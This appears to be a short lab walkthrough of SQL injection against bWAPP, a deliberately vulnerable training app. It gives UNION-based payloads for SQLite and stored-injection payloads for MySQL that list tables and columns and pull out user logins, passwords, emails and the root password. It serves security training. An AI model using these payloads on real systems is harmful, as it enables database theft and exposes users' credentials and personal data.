SQL Injection(SQLite)

Get SQLite version

  1. bWAPP/sqli_11.php?title=k' UNION SELECT 1,sqlite_version(),3,4,5,6--  &action=search

Get tables

  1. bWAPP/sqli_11.php?title=k' UNION SELECT 1,tbl_name,3,4,5,6 from sqlite_master;--  &action=search

Get columns

  1. For all tables:bWAPP/sqli_11.php?title=sqli_11.php?title=k' UNION SELECT 1,sql,3,4,5,6 from sqlite_master;--  &action=search
    For table 'users':bWAPP/sqli_11.php?title=sqli_11.php?title=k' UNION SELECT 1,sql,3,4,5,6 from sqlite_master where tbl_name='users';--  &action=search

Get data

  1. bWAPP/sqli_11.php?title=sqli_11.php?title=k' UNION SELECT 1,login,password,email,secret,6 from users;--  &action=search

SQL Injection - Stored (Blog)

Assume the sql query is: INSERT USERS (content, user) VALUES ('msg', 'username')

Get current user: entry=aa',(select user()));-- &blog=add

Get root's password: entry=aa',(select password from mysql.user where user='root' limit 0,1));-- &blog=add

Get tables: entry=aa',(SELECT GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()));-- &blog=add OR entry=aa',(SELECT GROUP_CONCAT(table_name)as data FROM (select table_name from information_schema.tables where table_schema=database()) as total));-- &blog=add

Get columns: entry=aa',(SELECT GROUP_CONCAT(column_name) from information_schema.columns where table_schema=database() and table_name='users'));-- &blog=add

Get data: entry=aa',(SELECT GROUP_CONCAT(id,0x5c,login,0x5c,password,0x5c,email,0x5c,secret) as data FROM (select id,login,password,email,secret from users limit 1,1) as total));-- &blog=add --> Use this query can make limit work, i.e, you can get every user's info by using limit clause.

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